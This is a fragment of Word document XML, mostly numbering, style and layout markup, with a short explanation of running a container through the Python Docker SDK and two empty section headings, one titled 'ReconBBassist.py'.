    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4F8B">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008A4F8B">
        <w:instrText>HYPERLINK "" \t "_blank"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="008A4F8B">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:t>In this example, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>docker.from_env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>() creates a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>DockerClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t> instance configured with appropriate environment variables </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008A4F8B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>stackoverflow.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>. The run method of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>DockerClient.containers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t> runs a Docker container with the specified image. The detach=True argument means the container will run in the background </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008A4F8B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>stackoverflow.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:t>Please replace '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>my_image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A4F8B">
        <w:t>' with the name of your Docker image. If your Docker image requires any command line arguments, you can provide them as additional arguments to the run method.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRPr="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B">
      <w:r w:rsidRPr="008A4F8B">
        <w:t>Remember, this is a very basic example. In a real-world application, you would need to handle errors and edge cases. For example, you might need to check if the Docker image exists and handle the case where the Docker container fails to start. You would also need to ensure that your Python script has the necessary permissions to interact with Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A4F8B" w:rsidRDefault="008A4F8B" w:rsidP="008A4F8B"/>
    <w:p w:rsidR="002B796D" w:rsidRDefault="00A02D7E" w:rsidP="008A4F8B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1026" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B796D" w:rsidRDefault="002B796D" w:rsidP="008A4F8B"/>
    <w:p w:rsidR="002B796D" w:rsidRDefault="00FB1B39" w:rsidP="002B796D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc166500844"/>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="002B796D">
        <w:t>Define checklist</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="002B796D" w:rsidRDefault="002B796D" w:rsidP="008A4F8B"/>
    <w:p w:rsidR="002B796D" w:rsidRDefault="002B796D" w:rsidP="008A4F8B"/>
    <w:p w:rsidR="00FB1B39" w:rsidRDefault="00FB1B39" w:rsidP="008A4F8B"/>
    <w:p w:rsidR="00FB1B39" w:rsidRDefault="00FB1B39" w:rsidP="00FB1B39">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc166500845"/>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB1B39">
        <w:t>ReconBBassist</w:t>
      </w:r>
      <w:r>
        <w:t>.py</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="00FB1B39" w:rsidRDefault="00FB1B39" w:rsidP="00FB1B39"/>
    <w:p w:rsidR="002916D0" w:rsidRDefault="002916D0" w:rsidP="008A4F8B"/>
    <w:p w:rsidR="002916D0" w:rsidRDefault="00A02D7E" w:rsidP="008A4F8B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1025" alt="" style="width:468pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E6E45" w:rsidRDefault="002E6E45" w:rsidP="000922EB"/>
    <w:sectPr w:rsidR="002E6E45" w:rsidSect="001916DC">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47415"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37A64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C44CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88CC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006EA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF46F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D1323"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BAE4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52C6C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D51E6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4725F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F9CFE1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DC82703"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A968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754B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D7E0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B755FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F6A23484"/>
    <w:lvl w:ilvl="0" w:tplc="04090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1096" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1816" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2536" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3256" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3976" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4696" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5416" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6136" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6856" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="307233D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4A8EA4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D641CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CCB82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DC5099"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6AF01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722CB0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="853A6510"/>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45453BE2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="128498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207CF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCFA3D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D0511B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59F8D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645418"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6EE51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353106"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CAC46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480460"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F9AE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7932415">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1660186309">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1770852313">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="916482462">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1233544907">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="319894335">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1059019095">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2143964098">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="900677149">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="931860888">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="307784698">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1672022882">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="700281692">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="38558114">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="2047676553">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1297562965">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="687604035">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="508179094">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="12890444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6DC"/>
    <w:rsid w:val="00090B6E"/>
    <w:rsid w:val="000922EB"/>
    <w:rsid w:val="000E2B04"/>
    <w:rsid w:val="00137D3A"/>
    <w:rsid w:val="00150CC1"/>
    <w:rsid w:val="00154344"/>
    <w:rsid w:val="00173DB4"/>
    <w:rsid w:val="001916DC"/>
    <w:rsid w:val="001E1B02"/>
    <w:rsid w:val="001F2E17"/>
    <w:rsid w:val="002010AF"/>
    <w:rsid w:val="00260FE6"/>
    <w:rsid w:val="002901F8"/>
    <w:rsid w:val="002916D0"/>
    <w:rsid w:val="002B39C4"/>
    <w:rsid w:val="002B796D"/>
    <w:rsid w:val="002C61CA"/>
    <w:rsid w:val="002E4190"/>
    <w:rsid w:val="002E6E45"/>
    <w:rsid w:val="00345EDC"/>
    <w:rsid w:val="00392539"/>
    <w:rsid w:val="003B774A"/>
    <w:rsid w:val="003F61BA"/>
    <w:rsid w:val="003F7F8F"/>
    <w:rsid w:val="0043628C"/>
    <w:rsid w:val="00464C9C"/>
    <w:rsid w:val="004A13F1"/>
    <w:rsid w:val="004B2C60"/>
    <w:rsid w:val="004E21CA"/>
    <w:rsid w:val="004E7AD3"/>
    <w:rsid w:val="004F3AB4"/>
    <w:rsid w:val="0058129B"/>
    <w:rsid w:val="005A0F40"/>
    <w:rsid w:val="005C046D"/>
    <w:rsid w:val="005C53EB"/>
    <w:rsid w:val="00606A24"/>
    <w:rsid w:val="00625BEE"/>
    <w:rsid w:val="006373E4"/>
    <w:rsid w:val="0067116A"/>
    <w:rsid w:val="006F5C48"/>
    <w:rsid w:val="008A4F8B"/>
    <w:rsid w:val="00901FA2"/>
    <w:rsid w:val="009A54C6"/>
    <w:rsid w:val="00A001CA"/>
    <w:rsid w:val="00A02D7E"/>
    <w:rsid w:val="00A121A3"/>
    <w:rsid w:val="00A21AE8"/>
    <w:rsid w:val="00A35931"/>
    <w:rsid w:val="00A74D58"/>
    <w:rsid w:val="00AB1710"/>
    <w:rsid w:val="00B2216E"/>
    <w:rsid w:val="00C0203E"/>
    <w:rsid w:val="00C21048"/>
    <w:rsid w:val="00CF4FF9"/>
    <w:rsid w:val="00D02D85"/>
    <w:rsid w:val="00D5464F"/>
    <w:rsid w:val="00D60623"/>
    <w:rsid w:val="00D8332B"/>
    <w:rsid w:val="00E24F92"/>
    <w:rsid w:val="00E652C5"/>
    <w:rsid w:val="00EB42C3"/>
    <w:rsid w:val="00EE7848"/>
    <w:rsid w:val="00FB1B39"/>
    <w:rsid w:val="00FF72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C416F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E4D70181-4FCE-3946-9915-9C7B6D261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AB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50CC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A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F3AB4"/>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4F3AB4"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3AB4"/>
    <w:pPr>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:smallCaps/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3AB4"/>
    <w:pPr>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3AB4"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3AB4"/>
    <w:pPr>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3AB4"/>
    <w:pPr>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3AB4"/>
    <w:pPr>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3AB4"/>
    <w:pPr>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3AB4"/>
    <w:pPr>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004B2C60"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00154344"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00150CC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8A4F8B"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00C210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210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9659">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="409353207">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="421225076">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="764377817">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="121654071">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="263809639">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="50004494">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="120"/>
                  <w:marBottom w:val="120"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="21050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1408">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1429888461">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1730613812">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2058815006">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="120"/>
                  <w:marBottom w:val="120"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="15901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87153">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1432160423">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="139689243">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="632441178">
